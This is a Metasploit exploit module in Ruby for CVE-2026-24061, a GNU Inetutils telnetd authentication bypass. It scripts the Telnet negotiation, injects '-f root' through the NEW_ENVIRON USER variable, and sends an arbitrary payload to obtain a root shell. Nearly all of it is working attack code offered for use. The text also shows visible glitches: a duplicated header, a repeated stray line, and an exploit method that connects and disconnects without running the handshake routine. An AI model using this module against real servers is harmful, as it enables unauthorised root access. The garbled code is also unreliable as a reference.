GNU Inetutils Telnet Authentication Bypass
##
# This module requires Metasploit: https://metasploit.com/download
# GNU Inetutils Telnet Authentication Bypass
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Telnet
include Msf::Exploit::Capture
NEW_ENVIRON_IS = "\x00"
NEW_ENVIRON_SEND = "\x01"
NEW_ENVIRON_VAR = "\x00"
NEW_ENVIRON_VALUE = "\x01"
SPACE = "\x20"
ZERO = "\x00"
FF = "\xff"
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061',
'Description' => %q{
The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in
versions up to version 2.7. During Telnet authentication the SB byte can be sent to indicate sub-negotiation which
allows for the exchange of sub-option parameters after both parties have agreed to enable a specific functional option.
Environment variables can be sent as sub-options and it's the USER environment variable which introduces the
authentication bypass in this scenario. When the USER environment variable gets sent to the GNU inetutils telnetd
service during authentication, the variable gets appended without proper sanitization to an execv call to the
/usr/bin/login binary. The login binary has a -f flag which skips authentication for a specific user. So the exploit
sets the `USER` environment variable to -f root and the telnetd service responds with a root shell.
},
'Author' => [
'jheysel-r7', # Metasploit module
'Kyu Neushwaistein' # aka Carlos Cortes Alvarez, discovery
],
'References' => [
['CVE', '2026-24061'],
['URL', 'https://github.com/DeadlyHollows/CVE-2026-24061-setup'], # Target setup
['URL', 'https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'DisclosureDate' => '2026-01-26', # Python PoC (TCP)
'License' => MSF_LICENSE,
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [
[ 'Automatic', {} ]
],
'Notes' => {
'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed - this behaviour is specific to version 1.9.4 of InetUtils running on Ubuntu 18.04
'Stability' => [CRASH_SAFE],
'SideEffects' => []
}
)
)
register_options([
Opt::RPORT(23),
OptString.new('USERNAME', [true, 'Username on device to bypass authentication as', 'root']),
OptString.new('TERMINAL_TYPE', [true, 'Terminal type to set when authenticating', 'XTERM-256COLOR']),
OptInt.new('TERMINAL_SPEED', [true, 'Terminal speed to set when authenticating', 38400])
])
end
def recv_telnet(fd, timeout)
data = ''
bytes_to_send = ''
begin
data = fd.get_once(-1, timeout)
return nil if data.blank?
data_string = telnet_bytes_to_names(data)
vprint_status('Incoming Bytes: ' + data_string)
if @client_sends == 0
bytes_to_send =
IAC + WILL + OPT_AUTHENTICATION +
IAC + DO + OPT_SGA +
IAC + WILL + OPT_TTYPE +
IAC + WILL + OPT_NAWS +
IAC + WILL + OPT_TSPEED +
IAC + WILL + OPT_LFLOW +
IAC + WILL + OPT_LINEMODE +
IAC + WILL + OPT_NEW_ENVIRON +
IAC + DO + OPT_STATUS
elsif @client_sends == 1
bytes_to_send =
IAC + DO + OPT_AUTHENTICATION +
IAC + DONT + OPT_ENCRYPT +
IAC + WONT + OPT_XDISPLOC +
IAC + WONT + OPT_OLD_ENVIRON
elsif @client_sends == 2
# For more info on Telnet Linemode Option please reference: https://www.rfc-editor.org/rfc/rfc1184.html
# The following binary blob was copied from a wireshark dump of a working PoC which used the telnet binary
linemode_slc =
"\x03\x01\x03\x00\x03\x62\x03\x04\x02\x0f\x05\x02\x14\x07\x62" \
"\x1c\x08\x02\x04\x09\x42\x1a\x0a\x02\x7f\x0b\x02\x15\x0c" \
"\x02\x17\x0d\x02\x12\x0e\x02\x16\x0f\x02\x11\x10\x02" \
"\x13\x11\x00" + FF + FF + "\x12\x00" + FF + FF
bytes_to_send =
IAC + SB + OPT_AUTHENTICATION +
ZERO + ZERO + ZERO +
IAC + SE +
IAC + SB + OPT_NAWS +
"\x00\x7e" + "\x00\x3d" +
IAC + SE +
IAC + SB + OPT_LINEMODE +
linemode_slc +
IAC + SE +
IAC + DO + OPT_SGA +
IAC + SB + OPT_LINEMODE +
"\x01\x14" +
IAC + SE
IAC + SE
elsif @client_sends == 3
print_status('Sending authentication bypass...')
bytes_to_send =
IAC + SB + OPT_TSPEED +
NEW_ENVIRON_IS +
"#{datastore['TERMINAL_SPEED']},#{datastore['TERMINAL_SPEED']}" +
IAC + SE +
IAC + SB + OPT_NEW_ENVIRON +
NEW_ENVIRON_IS +
NEW_ENVIRON_VAR + 'USER' +
NEW_ENVIRON_SEND + '-f' + SPACE + datastore['USERNAME'] + # this is the auth bypass, sending '-f root' as the NEW_ENVIRON_VAR "USER"
IAC + SE +
IAC + SB + OPT_TTYPE +
NEW_ENVIRON_IS +
datastore['TERMINAL_TYPE'] +
IAC + SE
elsif @client_sends == 4
bytes_to_send = IAC + WONT + OPT_ECHO
elsif @client_sends == 5
bytes_to_send = IAC + DO + OPT_ECHO +
IAC + WILL + OPT_BINARY +
IAC + WONT + OPT_LINEMODE
elsif @client_sends == 6
print_status('Sending payload...')
bytes_to_send = payload.encoded + "\x0d\x0a"
end
if datastore['VERBOSE']
if @client_sends == 6
vprint_status('Outgoing Bytes: ' + bytes_to_send)
else
vprint_status('Outgoing Bytes: ' + telnet_bytes_to_names(bytes_to_send))
end
end
fd.write(bytes_to_send) unless bytes_to_send.empty?
@trace << data
@recvd << data
fd.flush
@client_sends += 1
rescue ::EOFError, ::Errno::EPIPE => e
fail_with(Failure::UnexpectedReply, "Sending data failed with error: #{e}")
end
data
end
def exploit
@client_sends = 0
print_status('Connecting to telnet service... ')
connect
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
ensure
disconnect
end
end